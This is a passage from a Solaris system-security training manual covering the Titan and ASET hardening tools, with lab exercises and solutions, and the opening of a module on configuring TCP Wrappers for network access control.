fix-cronpath.sh Changes the permission and ownershipof items that run out of the root user’scron utility. This prevents a new Trojanhorse or SUID root files from beingcreated when the cron utility is run.

fix-modes.sh Fixes all the mode 775 directories andbinaries, and changes the ownership tothe root user where needed.

ftp-2.6_secure.sh Works with the Solaris 2.6 OperatingEnvironment and newer version of thein.ftpd daemon. It adds a UMASK=077into the /etc/default/ftpd file, andcreates a short FTP login warningmessage by creating the /etc/ftp-banner file.

hosts.equiv.sh Checks for a /etc/hosts.equiv file.

inetd.sh Changes the /etc/inetd.conf file andturns off most of the services.

loginlog.sh Fixes the syntax so that log entries arecreated for failed login attempts.

lpsched.sh Disables the lp command. This module isfor firewalls and non-print servers.

nddconfig.sh Creates the /etc/rc2.d/S70nddconfigfile and sets all the kernel networkmodules that are concerned with security.

nuke-sendmail.sh Disables the sendmail program. Youshould use this module on firewalls thatare not sendmail servers, servers that arenot sendmail servers, and all desktopsthat have their mail delivered to a server.

Table 14-1 Some Titan Modules (Continued)

Module Usage

Using Titan


Caution – If you do not have a root password set, then the previousTitan module disables root logins, too.

pam-rhosts-2.6.sh Modifies the /etc/pam.conf file byremoving the following line so that thePAM system does not allow rhostscommands:

rlogin auth sufficient/usr/lib/security/pam_rhosts_auth.so.1

passwd.sh Checks that all accounts have passwordsand adds a “* ” to blank password fields (ifrun in fix mode).

psfix.sh Creates the /etc/rc3.d/S79tmpfix fileso that upon boot the /tmp directoryalways has the sticky bit set mode 1777.

rootchk.sh Checks root ’s path and makes sure thatthe root user owns the directories andbinaries in the root user’s path. Removesthe “.” from the path.

syslog.sh Modifies the /etc/syslog.conf file sothat console messages are saved to systemlog files.

telnet-banner.sh Sets BANNER="" in the/etc/default/telnetd source so thatthe Solaris OE version is not displayedbefore the login prompt.

userumask.sh Adds in a umask of 022 for users in/etc/skel and /etc files.

utmp.sh Checks the utmp and utmpx files to ensurethat they are not world writable.

Table 14-1 Some Titan Modules (Continued)

Module Usage

Using Titan


Note – Rerun the fix-modes.sh script whenever you add packages orpatches. You should run this module on a regular basis using the cronutility or at least after adding any vendor patches.

Using Titan


Configuring Titan

After installing Titan and configuring it for your host environment (byrunning the scripts Titan-Config ), Titan is ready to use.

By default, Titan uses all of the installed modules. This is not appropriatefor most systems, so you should create a configuration file which includesonly the modules that you require.

Sample configuration files for a workstation (sample.Desktop ), a server(sample.Server ), and a firewall (sample.Firewall ) are provided inTitan’s installation directory. Use these as a starting point to develop yourown configuration files.

You specify the configuration file on the Titan command line by using the-c option. To use the desktop configuration file to verify yourworkstation’s security level use:

# ./Titan -c sample.Desktop

Using Titan


Running Titan

When you have installed and configured Titan, you can run it in severalmodes:

● Introductory Mode – Runs Titan with the -i option to get aninformation summary about each installed module, as follows:# ./Titan -i

● Verify Mode – Runs Titan with the -v option to get a security reportfrom each installed module, as follows:# ./Titan -v

● Fix Mode – Runs Titan with the -f option to fix security weaknessesfor each installed module, as follows:# ./Titan -f

Using Titan


Creating a Titan Configuration

Running Titan in default mode using all modules is not suitable for mostsystems. Create your own configuration to use the Titan modules that areapplicable to the hosts that you administer. You can create differentconfigurations for different types of hosts, such as:

● Database servers

● Web servers

● File servers

● User workstations

● Firewalls

● Proxy servers

Using Titan


When you create your own Titan configuration, you must specify whichmode you want each module to use. This shows an example configurationfile which verifies your hosts umask and BSM settings:

# more verify.configadd-umask.sh -vbsm.sh -v

You can run Titan with this configuration file using:

# ./Titan -c verify.config

You need a separate configuration file to fix security problems:

# more fix.configadd-umask.sh -fbsm.sh -f

You can run Titan with this configuration file by entering:

# ./Titan -c fix.config

When running Titan configuration scripts, the module output is saved to alog file in the log subdirectory of the Titan installation directory.

Note – You can run modules with the -v option and the -f option fromthe same configuration file, but this is not the standard practice.

Running a Single Module

You can run a single Titan module from the command line by specifyingthe path name of the module (all modules are in the bin/modulesdirectory in the Titan installation directory) and the run mode. Forexample, to verify the settings for the sendmail program use:

# bin/modules/nuke-sendmail.sh -v

Using Titan


Writing Your Own Titan Modules

Titan provides a template which you can copy and edit to create your ownmodules. To create your own modules, you must be familiar with writingshell scripts.

Begin with the template for your system architecture which is in Titan’sinstallation directory in a subdirectory of the arch directory. For theSolaris 8 OE:

arch/sol8sun4/src/stubs/skeleton

Copy this file to a working directory to make your changes, and add yourscript to the configuration files that you use.

The template file is fully described in the Frequently Asked Questions(FAQ) provided with Titan (docs/txt/FAQ.txt in the Titan installationdirectory).

Using Titan


Module Structure

The module template contains all the administration code for checking theTitan configuration and user command line. You only complete the threefunctions which are called for in each of the possible run modes. Thesefunctions are:

● Introduction section – Intro() – Any text that you place betweenthe “EOF_INTRO” keywords is echoed to the screen when the userstarts the script with the -i option, as shown in Code 14-1.

Code 14-1 Titan Introduction Section

1 Intro() {2 cat << EOF_INTRO3 Add in the information on what the script does here4 EOF_INTRO5 }

Using Titan


● Verify section – Check() – Use this function when a Titan script isrun in the -v verify mode. Look through the existing Titan scripts tosee some of the ways that the Check() function checks the system.Every Check() function must write a “PASSES CHECK” or a “FAILSCHECK” message so that users can determine if a Titan fix is neededor has already been applied to the system. Code 14-2 shows anexample.

Code 14-2 Titan Verify Section

1 Check() {2 if [ -f /etc/init.d/init.dmi ]; then3 echo " dmi daemon is enabled: FAILS CHECK"4 exit 15 else6 echo " dmi doesn't start at boot time: PASSES CHECK"7 fi8 }

● Fix section – Fix() – This function changes or modifies system files.The Fix() function is only invoked when the user specifically runs aTitan script with the -f flag. The Fix() function hardens the systemand can be quite complex. Code 14-3 is an example Fix() functionwhich moves and renames start-up files so that on system boot thesystem no longer runs.

Code 14-3 Titan Fix Section

1 Fix() {2 if [ -f /etc/init.d/init.dmi ]; then3 echo " Saving /etc/init.d/init.dmi to /etc/init.d/init.dmi.ORIG"4 /bin/mv /etc/init.d/init.dmi /etc/init.d-init.dmi.ORIG.$$5 /bin/mv /etc/rc2.d/K77dmi /etc/rc2.d-K77dmi.ORIG.$$6 /bin/mv /etc/rc3.d/S77dmi /etc/rc3.d/S77dmi.ORIG.$$7 chmod 0100 /etc/init.d-init.dmi.ORIG.$$8 chmod 0100 /etc/rc2.d-K77dmi.ORIG.$$9 chmod 0100 /etc/rc3.d/S77dmi.ORIG.$$10 if [ $? -ne 0 ]; then11 echo " ERROR: Could not rename /etc/rc3.d/S77dmi ;exiting"12 exit 113 else14 echo "Done ... "

Using Titan


15 fi16 fi17 }

These functions are the essential elements of a Titan script. After youwrite your script, copy or move your script to the Titan modules directory(bin/modules ) and make it executable. When Titan is run with the -i ,-v , or -f options, it runs all commands in the bin/modules directory thatare:

● Plain files

● Executable

Running Titan runs your script. If you use configuration files, you mustinclude your script name in the configuration file.

Note – Another way to configure Titan is to move all the unnecessarymodules out of the bin/module directory or to remove the executablepermissions from the modules that you do not want to use.

Enhancing System Security Using ASET



The Solaris OE includes a software security guard for Sun systems calledASET. ASET is a set of tasks that detect potential security vulnerabilitiesand alter file access to improve system security.

Like the security measures of a building, ASET can provide levels ofcomputer system security that depend on what the system is used for andhow valuable or sensitive the data or programs that reside on the systemare.

Note – ASET is an excellent tool when used as a periodic checklist ofitems to be examined and implemented, but it is only part of an overallplan to achieve system protection.



Using ASET Security Levels

ASET has three levels of security:

● Low – This level performs a number of checks and produces reportsthat outline potential security weakness. This level resets ownershipand permissions of important system files to the default settingsused when the system was first installed.

● Medium – This level modifies some system files to restrict systemaccess if security risks are found. These modifications should notaffect any system services.

● High – This level provides a more secure system by setting systemparameters to minimal access permissions. Most system applicationsand commands should work normally, but security protections takeprecedence over any other system behavior.

By default, ASET runs at the lowest level of security.



The ASET utility performs seven tasks that make specific checks and,depending on the selected level of security, adjustments to system filesand permissions to improve system security. Every ASET task includesthe creation of a report noting possible weaknesses found and changesmade. A description of each of the tasks is listed in Table 14-2.

Table 14-2 ASET Tasks

Task Report Name

Check whether the system can be safely usedas a firewall in a network

firewall.rpt

Check initialization files (.profile , .login ,.cshrc ) for umask and PATHvariable settings

env.rpt

Check the contents of system configurationfiles such as the /etc/default/login file

sysconf.rpt

Check the consistency and integrity of/etc/passwd and /etc/group entries

usrgrp.rpt

Verify appropriate system file permissionsbased on configurations in the tune.* files

tune.rpt

Examine owner, permissions, links, and sizeof important system files

cklist.rpt

Verify appropriate EEPROM securityparameters

eeprom.rpt



Running ASET Manually

To use the aset command, you must install the ASET (SUNWast) package,which is a default package for the Solaris 8 OE. The necessary scripts anddirectories usually reside in the /usr/aset directory, but you can installthem elsewhere. The /usr/aset directory is not in the standard searchpath for the root user. The main script doing the work is/usr/aset/aset .

By default, the aset utility does not run automatically; it must be startedby the superuser. The aset utility is usually run on a periodic basisinteractively or as a cron process.

To run the aset utility interactively at its lowest security level, type:

# /usr/aset/aset



To adjust the level of security described previously in this module, use the-l option, and specify the level as a keyword:

● low – Low-level security (the same as the no option command)

● med– Medium-level security

● high – High-level security

To run aset interactively with the highest level security, type:

# /usr/aset/aset -l high//usr/aset/aset -p -1 high======= ASET Execution Log =======ASET running at security level highMachine = wallace; Current time = 0601_23:30aset: Using /usr/aset as working directoryExecuting task list ...firewallenvsysconfusrgrp...



To redirect the reports somewhere other than /usr/aset , use the -doption to specify the new directory, as follows:

# /usr/aset/aset -d ./aset_reports

The tasks that ASET performs are controlled by several scripts in the/usr/aset/tasks directory. There is one script for each task with thesame name as the tasks shown in Table 14-2 on page 14-28. You canmodify the scripts to customize the actions of the task.

ASET behavior is controlled by the /usr/aset/asetenv script. You canmodify this script to customize which ASET tasks should be run (if theyare not all required). The firewall setup task, for example, disables theforwarding of IP packets and hides routing information from the externalnetwork. If you want to run ASET at high security but do not needfirewall protection, comment out that task from the /usr/aset/asetenvfile.



Restoring the System

Within the aset directory there is a restore script called:

# /usr/aset/aset.restore

Running this script restores the system back to the state it was in beforethe aset command was run. Each task script has a corresponding.restore script which undoes the actions of the task script.

Monitoring Task Status

Depending on the size and speed of a system and your chosen level ofsecurity, it might take some time for ASET to complete its tasks and issuethe reports. The aset program is usually run late at night when the hostsystem is idle.

When running ASET interactively, monitor the progress of the checks tomake sure that they have completed before attempting to interpret thedata from the reports. To monitor the checks, use the taskstat command.In Code 14-4, the output from the taskstat command indicates that theASET checks are not complete.

Code 14-4 The taskstat Command

1 # /usr/aset/util/taskstat2 Checking ASET tasks status ...3 Task firewall is done.4 Task env is done.5 Task sysconf is done6 Task usrgrp is done.7 The following tasks are done:8 firewall9 env10 sysconf11 usrgrp12 The following tasks are not done:13 tune14 cklist15 eeprom

The taskstat information is stored in the taskstatus file in thedirectory where the reports are stored.



Running ASET Periodically

Although you can run ASET interactively, it is usually more effective torun ASET periodically from the cron utility. If you schedule ASET thisway, it can report on possible security problems introduced during anormal work day.

To add an ASET entry to the root crontab file, use the -p option inaddition to the required security level. By default, ASET runs every nightat midnight.



The command shown in Code 14-5 runs ASET on a periodic basis usingthe highest level of security.

Code 14-5 Running ASET Periodically

1 # /usr/aset/aset -p -l high2 /usr/aset/aset -p -l high3 ======= ASET Execution Log =======4 ASET running at security level high5 Machine = wallace; Current time = 0601_23:306 aset: Using /usr/aset as working directory7 ASET execution scheduled through cron.

Change the PERIODIC_SCHEDULEenvironment variable in the/usr/aset/asetenv file to control the frequency of when ASET runs. Theformat of this variable mirrors the format of the scheduling information incrontab . The default entry in the asetenv file is:

# grep PERIODIC /usr/aset/asetenvPERIODIC_SCHEDULE="0 0 * * *"

To change the frequency of when ASET is run, edit this line in theasetenv file to a new value and run the aset program with the -p optionagain. This updates that crontab file. Alternatively, you can edit the rootcrontab file using:

# crontab -e



Interpreting ASET Reports

Each of the seven tasks that the aset command performs creates a reportfile specific to that task. Each file ends with .rpt . When you run ASET, anew directory is created under the /usr/aset/reports directory. Thedirectory named is a timestamp of when ASET was run. Each reportsubdirectory name has the following format:

MMdd_hh:mm

where MM, dd, hh, and mmare all two-digit numbers representing the reportmonth, day, hour, and minute. For example:

1024_02:00

For convenience, a link directory called latest points to the last directoryestablished by ASET.



You can view each of the seven task report files individually for details.Code 14-6 shows the contents of one of these report files.

Code 14-6 Example ASET Report

1 # more /usr/aset/report/latest/usrgrp.rpt2 *** Begin User And Group Checking ***3 Checking /etc/passwd ...4 Checking /etc/shadow ...5 Warning! Shadow file, line 1, no password:6 alice::6445::::::7 ... end user check.8 Checking /etc/group ...9 ... end group check.10 *** End User And Group Checking ***

The security level you select and the health of the system determine thesize and content of the report files. You should review each of them anddecide whether adjustments should be made.

Confirming Security Improvements Using the asetCommand

If you decide that adjustments to the system are required, make them andthen run the aset command again to ensure that the reports change.

For example, even at the low level of security, you should not use a umasksetting of 022 in the /etc/profile file. When you install ASET, the envtask reports that this default setting in the /etc/profile should bechanged. When you change the umask from 022 to 027 in /etc/profile ,you tighten security. When the env task is run again, the env.rpt file nolonger reports the problem.

Interpreting and Configuring the tune.* Files

The tune.rpt task, which checks file ownership and permissions, isconfigured from the files in the /usr/aset/masters directory. For eachlevel of security, there is a corresponding tune file: tune.low , tune.med ,and tune.high .



If you do not like the default settings of the tune files, you can makeadjustments to the appropriate tune files and run the tune task again togain extra control of file permissions. Code 14-7 shows various entriesfrom the tune.low file.

Code 14-7 The tune.low File

1 # more /usr/aset/masters/tune.low2 # Tune list for level low3 # Format:4 # pathname mode owner group type5 / 02755 root root directory6 /bin 00777 root bin symlink7 /sbin 02775 root sys directory8 /usr/sbin 02775 root bin directory9 /etc 02755 root sys directory10 /etc/chroot 00777 bin bin symlink11 /etc/clri 00777 bin bin symlink12 /etc/crash 00777 root sys symlink13 /etc/cron 00777 root sys symlink14 /etc/fsck 00777 bin bin symlink15 /etc/fuser 00777 bin bin symlink16 /etc/halt 00777 bin bin symlink17 /etc/link 00777 root bin symlink18 /etc/mknod 00777 bin bin symlink19 /etc/mount 00777 bin bin symlink20 /etc/mnttab 00644 root root file21 /etc/vfstab 00664 root sys file22 /etc/passwd 00644 root sys file23 /etc/shadow 00400 root sys file24 /etc/nsswitch.conf 00644 root sys file25 /etc/resolve.conf 00644 root sys file

The five fields on each line in the tune files are:

● The absolute path name of the file, directory, or symbolic link – Youcan use regular shell, wildcard characters in the path name formultiple references.

● The octal representation of the file mode as 5 digits representing filetype (always 0), SUID, SGID, sticky bit execution modes, and rwx foruser, group, and others. If the current setting is already morerestrictive than the specified value, ASET does not loosen thepermission settings. For example, if mode is 00777, the permissiondoes not change, because it is always less restrictive than the currentsetting.



● The user associated with the file – This must be a name rather thanthe numeric UID.

● The group associated with the file – This must be a name rather thanthe numeric GID.

● The file type – This value can be symlink for a symbolic link,directory for a directory, and file for all other file types.

Exercise: Hardening the System



In this module you complete the following tasks:

● Install and configure Titan

● Use Titan to report the security weaknesses on your system

● Create a custom Titan configuration

● Use ASET to run interactively in the low-security mode

● Configure ASET to run periodically

Preparation

Using a text editor such as vi , edit the /etc/shadow file and set thepassword for user alice to be blank.

Tasks

In the first of these exercises, you install and configure Titan, and then useTitan to report on security weaknesses on your system. Next you create acustom Titan configuration to check and update your system. Finally, youconfigure and use ASET to harden your system.


Task – Installing and Configuring Titan

To set up Titan:

1. Obtain the latest version of Titan from the download site listed in the“Additional Resources” on page 14-3. To speed up the practicalexercise, a copy of the download file (Titan,v4_0ALPHA-9.tar ) isincluded in the /usr/local/pkg directory.

Extract the contents of this archive into the /usr/local directory.It creates a subdirectory called Titan,v4.0ALPHA-9 .



2. Read the documentation for Titan but do not follow the instructionsyet. The documentation is in the docs/txt subdirectory. There arealso HTML documents for reading with a browser such as Netscapein the docs/html subdirectory. Begin with the Tutorial-short file:

# cd /usr/local/Titan,v4.0ALPHA-9# cd docs/txt# more Tutorial-short

3. Configure Titan for your operating system by entering the followingcommands:

# cd /usr/local/Titan,v4.0ALPHA-9# ./Titan-Config

4. Enter y ( yes) when asked to make backups of the files Titanmodifies, as shown below:

Titan can backup all of the files it modifies; This is recommendedNOTE: in the process of backing up files /etc/shadow as well as otherimportant files will be backed up. It is IMPORTANT that you keep thisbackup SAFE, or delete it after you are sure Titan didn't do somethingunwantedproceed? y/n: y

The installation is now complete. Titan installs a file called Titan inthe titan directory which is configured for the version of Solaris OEthat you are running.

Task – Using Titan to Report on Security Problems

Run Titan to get a security report for your system.



Task – Creating and Running a Titan Configuration

To set up Titan:

1. Study the sample configuration file sample.Desktop in the Titanconfiguration directory.

2. Follow the format of the sample file and create a configuration filewhich verifies the following (you can refer to the notes for the Titanmodules you need to use):

a. Ensure that the root user owns all files in directories in the rootsearch path.

b. Stop the sendmail program from running.

c. Create a standard /etc/issue message file.

d. Stop the telnet command from displaying the workstationinformation.

3. Run Titan with this configuration to verify whether the faults exist ornot.

4. Create a similar configuration to fix the faults identified in step 2.

5. Run Titan to apply this configuration to your system. You mustreboot your workstation to apply the sendmail change.

6. Verify that the changes have been made.

Task – Running ASET Interactively

To set up ASET:

1. Run the aset command using the low security option. The asetcommand should take only a minute or two to run.

2. Wait until the tasks are complete by monitoring ASET with thetaskstat command.

3. View the ASET reports and rectify the problems identified in thereports to make your system more secure. Verify that the changes arecorrect by re-running ASET.

4. Restore the system to its original state prior to running ASET.



Task – Configuring ASET Periodically

In this exercise you configure the system to run the ASET utilityperiodically. But before doing so, you must customize one of the taskscripts. This requires some basic programming skills.

Normally, the aset command should be run late at night when the systemload is light. For this exercise you configure aset to run a few minutesafter the time you begin this exercise.

1. Note the time of day by running the desktop clock tool or runningthe date command on the command line.

2. Update the PERIODIC_SCHEDULEvariable definition in the/usr/aset/asetenv file to run ASET five minutes from now.Schedule ASET to run periodically.

3. Check the reports produced by ASET.

4. Restore the system to its original state prior to running ASET.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions


Installing and Configuring Titan

There are no solutions to this task.

Using Titan to Report on Security Problems

Run Titan to get a security report for your system.

Run Titan in verify mode and save the output to a file. For example:

# cd /usr/local/Titan,v4.0ALPHA-9# ./Titan -v >/tmp/titan.log# more /tmp/titan.log

Creating and Running a Titan Configuration

1. Study the sample configuration file sample.Desktop in the titanconfiguration directory.

# cd /usr/local/Titan,v4.0ALPHA-9# more sample.Desktop

2. Follow the format of the sample file and create a configuration filewhich fixes the following (you can refer to the notes for the Titanmodules you need to use):

a. Ensure that the root user owns all files in directories in theroot search path. Stop the sendmail program from running.

b. Create a standard /etc/issue message file.

c. Stop the telnet program from displaying the workstationinformation.

# vi verify.confrootchk.sh -vnuke-sendmail.sh -vcreate-issue.sh -vtelnet-banner.sh -v

Exercise Solutions


3. Run Titan with this configuration to verify whether the faults exist.

# ./Titan -c verify.conf

Run Titan with this configuration, and observe the FAILS CHECKmessages that indicate that the Titan changes have not been applied.

4. Create a similar configuration to fix the faults identified in Step 2.

# vi fix.confrootchk.sh -fnuke-sendmail.sh -fcreate-issue.sh -ftelnet-banner.sh -f

5. Run Titan to apply this configuration to your system. You mustreboot your workstation to apply the sendmail change.

# ./Titan -c fix.conf# init 6

6. Verify that the changes have been made.

a. Check the file permissions of directories such as /usr/bin and/usr/sbin .

# ls -al /usr/bin /usr/sbin | more

b. Try to use the telnet command to connect to port 25, andverify that the connection is refused.

# telnet localhost 25Trying ::1...telnet: connect to address ::1: Connection refusedTrying 127.0.0.1...telnet: Unable to connect to remote host: Connection refused

c. Use the telnet command to connect to your system, and verifythat the output does not identify the host system and includesthe standard message in the /etc/issue file.

1 # telnet localhost2 Trying ::1...3 Connected to localhost.4 Escape character is ' ]'.

Exercise Solutions


5 ########################################################################6 # This system is for the use of authorized users only. #7 # Individuals using this computer system without authority, or in #8 # excess of their authority, are subject to having all of their #9 # activities on this system monitored and recorded by system #10 # personnel. #1112 # In the course of monitoring individuals improperly using this #13 # system, or in the course of system maintenance, the activities #14 # of authorized users may also be monitored. #1516 # Anyone using this system expressly consents to such monitoring #17 # and is advised that if such monitoring reveals possible #18 # evidence of criminal activity, system personnel may provide the #19 # evidence of such monitoring to law enforcement officials. #20 #######################################################################21 login:

d. Run Titan again with the verify configuration, and observe thePASSES CHECKmessages that indicate that the Titan changeshave been applied.

# ./Titan -c verify.conf

Running ASET Interactively

1. Run the aset command using the low security option. The asetcommand should take only a minute or two to run.

# /usr/aset/aset -l low======= ASET Execution Log =======ASET running at security level lowMachine = wallace; Current time = 0602_15:06aset: Using /usr/aset as working directory

Executing task list ...firewallenvsysconfusrgrptunecklisteeprom

All tasks executed. Some background tasks may still be running.

Exercise Solutions


2. Wait until the tasks are complete by monitoring ASET with thetaskstat command:

# /usr/aset/util/taskstatChecking ASET tasks status ...Task firewall is done.Task env is done.Task sysconf is done.Task usrgrp is done.Task tune is done.Task cklist is done.Task eeprom is done.

The following tasks are done:firewallenvsysconfusrgrptunecklisteeprom

All tasks have completed.

3. View the ASET reports, and rectify the problems identified in thereports to make your system more secure.

# cd /usr/aset/reports/latest# cat env.rpt*** Begin Environment Check ***

Warning! umask set to umask 022 in /etc/profile -notrecommended.

*** End Environment Check ***# cat usrgrp.rpt*** Begin User And Group Checking ***

Checking /etc/passwd ...Checking /etc/shadow ...Warning! Shadow file, line 12, no password:fred::10379::::::... end user check.Checking /etc/group ...... end group check.*** End User And Group Checking ***

Exercise Solutions


The files indicate that /etc/profile must have the umask commandchanged, and that there is no password for user fred in the/etc/shadow file. Make the changes to the files that were noted inthe previous step.

Verify that the changes are correct by running ASET again:

# /usr/aset/aset -l low# cat env.rpt...# cat usrgrp.rpt

4. Restore the system to its original state prior to running ASET:

# /usr/aset/aset.restoreaset.restore: beginning restoration ...

Executing /usr/aset/tasks/firewall.restore.....................Resetting security level from low to null.

aset.restore: restoration completed.

Configuring ASET Periodically

1. Note the time of day by running the desktop clock tool or runningthe date command on the command line:

# dateTue May 6 10:12:32 MDT 2001

2. Update the PERIODIC_SCHEDULEvariable definition in the/usr/aset/asetenv file to run ASET five minutes from now:

# vi /usr/aset/asetenvPERIODIC_SCHEDULE="17 10 * * *"

Schedule ASET to run periodically:

# /usr/aset/aset -p -l low======= ASET Execution Log =======

ASET running at security level low

Machine = wallace; Current time = 1102_10:13

aset: Using /usr/aset as working directoryASET execution scheduled through cron.

Exercise Solutions


3. Check the reports produced by ASET:

# /usr/aset/util/taskstat

Note – If you run the taskstat command too soon, you get the report forthe last run of ASET. You must wait for the cron utility to schedule thenew ASET report.

# /usr/aset/util/taskstatChecking ASET tasks status ...Task firewall is done.Task env is done.Task sysconf is done.Task usrgrp is done.Task tune is done.Task cklist is done.Task eeprom is done.

The following tasks are done:firewallenvsysconfusrgrptunecklisteeprom

All tasks have completed.# cd /usr/aset/reports/latest# more *.rpt

4. Restore the system to its original state prior to running ASET:

1 # /usr/aset/aset.restore2 aset.restore: beginning restoration ...34 Executing /usr/aset/tasks/firewall.restore56 ..................7 usrgrp.restore completed.89 Descheduling ASET from crontab file...10 The following is the ASET schedule entry to be11 deleted:12 17 10 * * * /usr/aset/aset -l med -d /usr/aset13 Proceed to deschedule: (y/n) y

Exercise Solutions


1415 Resetting security level from med to null.1617 aset.restore: restoration completed.


Module 15

Authenticating Network Services

Objectives


● Explain how to authenticate network clients

● Install and configure Transmission Control Protocol (TCP) Wrappers

● Monitor the use of telnet , file transfer protocol (FTP), and otherutilities with TCP Wrappers

● Use TCP Wrappers to control network access to the system

Relevance


Relevance

?!

Discussion – The following questions are relevant to understandingauthentication of network connections:

● Can you restrict access to your network to authorized clients only?

● Can you log all network accesses?

● Can you send immediate warnings (using pagers or othermechanisms) when an invalid client attempts to access a networkservice?


Authenticating Network Services 15-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C


Additional resources – The following references can provide additionaldetails on the topics discussed in this module:


● Online manual pages for hosts_access(5) , inetd.conf(4) , andsyslog.conf(4)


● TCP Wrappers ported to Solaris OE 2.x;[http://www.sunfreeware.com ]

Understanding Network Authentication



TCP/IP is controlled on the Solaris OE by a complex system of daemons.These daemons have developed over many years and provide a robustand powerful way to configure network services. The services arepowerful and it is easy to make a mistake in configuration, or to forget toconfigure a service.

Most network services have minimal or no authentication. The telnetand FTP services only require a valid user name and password, whereasAnonymous FTP and the Finger daemon allow access to any client.

Logging is practically non-existent for most network services.



When considering security, these authentication and logging weaknessesare a major problem with the default UNIX network services. You needlogging to establish a good audit trail when tracking break-ins andattempted break-ins. You also need some form of client authentication andaccess control. Many sites would like to run an Anonymous FTP servicefor their own users (remote and local) but deny access to all other clients.

Consider how useful it would be to only allow Anonymous FTP for clientsin your own domain (sun.com for example).

From an administrative point of view, if auditing and host access controlcould be applied in a logical and consistent manner, then network securitycould be greatly improved.

The solution is to install TCP Wrappers.

Using TCP Wrappers


Using TCP Wrappers

TCP Wrappers (tcpd ) are small daemon programs that wrap around thestandard network daemons. You can install them without changingexisting network software programs. The Wrappers report the name of theclient host and the requested service using the Syslog program.

TCP Wrappers do not exchange information with the client or serverapplications. A small initialization overhead is required to authenticate thehost and log the connection, but Wrappers impose no overhead on thecommunications between the client and server applications.

TCP Wrappers’ functionality includes transparent logging for TCP-basednetwork daemons including tftp , exec , ftp , telnet , rlogin , rsh , andfinger . TCP Wrappers provide a level of security above those of the basicoperating environment.

Note – TCP Wrappers do not provide full security against unwelcomevisitors. A further level of security is provided by IP filtering andfirewalls.

Using TCP Wrappers


TCP Wrappers surround the service daemon with another program calledtcpd which logs the incoming request and optionally provides accesscontrol, allowing or denying the connection depending on where therequest originates from.

The /etc/inetd.conf configuration file is changed so that the inetdprogram starts the wrapped version of each network daemon. Forexample, to service an incoming FTP connection, /usr/sbin/tcpd isstarted instead of /usr/sbin/in.ftpd . If tcpd allows the incomingrequest, it starts the in.ftpd program; if it denies the incoming request, itlogs the attempt, but otherwise ignores the request.

Note – The TCP Wrappers package was written by Wietse Venema andwas formerly called log_tcp . Some sites still list it by that name.

Using TCP Wrappers


Obtaining and Installing TCP Wrappers

TCP Wrapper can be obtained in two forms:

● As an SVR4 package from http://www.sunfreeware.com .

● As a standard tar package which can be compiled for most UNIXplatforms including Linux.

TCP Wrappers can be downloaded from most archive sites on the Webincluding ftp://playground.sun.com/pub/casper .

The SVR4 package installs TCP Wrappers in the /usr/local directory,putting the tcpd program in the /usr/local/sbin directory and themanual pages in the /usr/local/man/man* directory. Additionaldocumentation is installed in the /usr/local/docs/tcp_wrappersdirectory.

Configuring TCP Wrappers



TCP Wrappers can be configured in one of two ways:

● Hidden – This involves replacing the network service daemons. Thismethod might sound appealing, but it places an extra load on theadministrator when you update the operating system. TCP Wrappersmust be reconfigured after performing an upgrade or applyingpatches.

● Visible – This involves changing the /etc/inetd.conf file. Thisapproach is less secure than the hidden method because the/etc/inetd.conf file can be viewed by any user. However, thismethod is often preferred because you only need to change one file.

Note – The general recommendation is to leave the daemons where theyare and change the /etc/inetd.conf file. It is easier to maintain one fileduring patch installation or software upgrades than to locate and moveseveral programs.



Installing Hidden TCP Wrappers

Configure hidden TCP Wrappers by moving the standard networkprograms to a predetermined directory and replacing them with the tcpdprogram.

To configure FTP to use TCP Wrappers, do the following:

# mkdir /usr/save# mv /usr/sbin/in.ftpd /usr/save# cp tcpd /usr/sbin/in.ftpd

The directory that stores the real network programs is compiled into theTCP Wrappers programs and is set to the /usr/sbin directory for theSVR4 package. However, this configuration means that the hiddenconfiguration cannot be used with this package because the savedprograms and the tcpd program must reside in the same directory.

To use the hidden configuration, obtain the TCP Wrappers source filesand build TCP Wrappers specifying an alternate directory (for example/usr/save ). Full instructions are included in the online tcpd(1M) manualpage and the Makefile shipped with TCP Wrappers.



Installing Visible TCP Wrappers

Configure visible TCP Wrappers by updating the service entry in/etc/inetd.conf to use the tcpd program. The name of the realprogram is specified as the first command line parameter. The actualnetwork server program must be in the search path used by tcpd . TheSolaris OE default search path includes the /usr/sbin directory, whereall the network server programs are installed.

To configure FTP to use visible TCP Wrappers replace this inetd.confline:

ftp stream tcp6 nowait root /usr/sbin/in.ftpd in.ftpd

with:

ftp stream tcp nowait root /usr/local/sbin/tcpd in.ftpd

Besides changing the executable program, the configuration also removesthe support TCP/IP version 6. At the present time, TCP Wrappers are notcompatible with the Solaris OE support for TCP/IP v6.



Checking TCP Wrappers’ Configuration

TCP Wrappers include a check program called tcpdchk which validatesthe TCP Wrapper installation.

The tcpdchk program examines the access control files (see “ConfiguringHost Access Control” on page 15-16, and validates the entries in these filesagainst entries in the network configuration files. The tcpdchk programreports problems, such as non-existent path names, services not controlledby tcpd that appear in access control files, services that should not bewrapped, non-existent host names, or non-Internet address forms.

To get a comprehensive report, run the program with the followingoptions:

# tcpdchk -av



To check an individual host for access to a specific service use thetcpdmatch command (host access control is described in “ConfiguringHost Access Control” on page 15-16).

# tcpdmatch in.ftpd grommitwarning: in.ftpd: service possibly not wrappedclient: hostname grommitclient: address 192.168.0.1server: process in.ftpdaccess: granted

Configuring Client Access Logging



TCP Wrappers log all network services to the Syslog program. Logginguses the mail facility and generates the following message levels:

● info – Messages for successful network connections

● warning – Messages for denied network access

● error – Messages for incorrect configuration files



Configure the syslogd.conf file to log TCP Wrapper messages, as shownin Code 15-1.

Code 15-1 Configuring the syslogd.conf file

# grep mail /etc/syslogd.conf*.err;kern.notice;auth.notice;mail.warning /dev/sysmsgmail.info;mail.warning /var/adm/network.log

The following example is the log of a successful client connection:

May 25 11:10:08 wallace in.telnetd[931]: [ID 927837 mail.info] connectfrom grommit

Configuring Host Access Control



Solaris OE provides a standard mechanism for host access control. It usesthe /etc/hosts.allow and /etc/hosts.deny files to set access controlrules. Host access does not read entire files; when a matching entry isfound, the rule is applied and no additional rules are taken into account.

TCP Wrappers review the files in the following order:

1. /etc/hosts.allow – An entry here grants client access.

2. /etc/hosts.deny – An entry here denies client access.

3. If the files are empty or do not exist, access is allowed.

The default access control allows all hosts to have access to all services.

Note – Any host not explicitly mentioned, or covered by an implicit rule,is allowed.

TCP Wrappers use the Solaris OE host access control mechanism toauthorize remote host access to network services.



Access File Format

